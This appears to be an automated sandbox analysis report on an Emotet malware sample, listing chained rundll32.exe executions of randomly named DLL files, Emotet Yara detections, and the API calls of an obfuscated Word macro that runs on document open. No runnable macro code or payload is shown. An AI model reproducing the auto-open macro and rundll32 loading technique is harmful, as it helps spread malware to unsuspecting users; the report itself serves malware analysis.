Imagebase:	0x740000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2109883374.0000000000271000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2109758118.0000000000250000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2444 Parent PID: 2884

General

Start time:	15:48:51
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ailact\ivkbd.qrm',Control_RunDLL
Imagebase:	0x740000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2111593595.0000000000200000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2111624405.0000000000221000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2472 Parent PID: 2444

General

Start time:	15:48:51
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Akjjgl\zoljk.jdx',Control_RunDLL
Imagebase:	0x740000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2113623618.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2113814198.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2804 Parent PID: 2472

General

Start time:	15:48:52
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Liisdspzre\vtsbueurz.syo',Control_RunDLL
Imagebase:	0x740000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2115505168.00000000006F1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2115470379.00000000006D0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 3024 Parent PID: 2804

General

Start time:	15:48:53
Start date:	06/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uwcxnjiedvybvto\cwmcmgelygpijt.aui',Control_RunDLL
Imagebase:	0x740000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2345304717.0000000000250000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: A5gd21klfqu9c6rs

Declaration

Line	Content
1	Attribute VB_Name = "A5gd21klfqu9c6rs"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine Document_open, APIs: 120, Strings: 0, Number of lines: 3, Relevance: 181.503

APIs	Meta Information
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Zw1k7hcmdl66
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Item
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Hyii7r76oq89
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: diCXTi
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: NZiApKAp
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: vrYYHIDxI
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: gzTFLxb
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: PjNhJNA
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: oAaNlB
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: sySRJ
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: UwyYSBsBN
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: tpOgXmm
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: MHYlQAD
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: GznGGHyG
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: bbsIZ
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Mid
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Name
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Application
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: swNGWdd
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: rJEkbLH
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: vEBqHrDnD
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: tWcKo
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: LzxxRHG
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: EKezHIC
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: DpYbmDA
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hDJDJ
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: dXiwA
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hFSyAfFrF
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hXxQDACJA
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: xkQqDXCcD
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Mid
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Len
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: lBenBDA
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: UavHTIBHo
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: IcAHwPH
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: BNmrm
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: FLtYjKHC
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: qAUhkIMz
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Create
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: V2enhc4htwl7z6bh
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Thriap3q9rgf3yy9y
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: zZuzBZGD
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: OIbfvEEFF
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: eLmLDU
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: FYVZFEH
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hoyzuBGCP
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close
Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: lADFBaJ

Line	Instruction	Meta Information
9	Private Sub Document_open()
10	G8xesq0b8jlsfrsp	executed
11	End Sub

Module: Owppnp8hah4xo788

Declaration

Line	Content
1	Attribute VB_Name = "Owppnp8hah4xo788"

Executed Functions

Function G8xesq0b8jlsfrsp, APIs: 624, Strings: 66, Number of lines: 195, Relevance: 1394.195

APIs	Meta Information
Zw1k7hcmdl66
Item
Hyii7r76oq89
diCXTi
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
NZiApKAp
Close
vrYYHIDxI
gzTFLxb
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
PjNhJNA
Close
oAaNlB
sySRJ
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
UwyYSBsBN
Close
tpOgXmm
MHYlQAD
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
GznGGHyG
Close
bbsIZ
Mid
Name
Application
swNGWdd
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
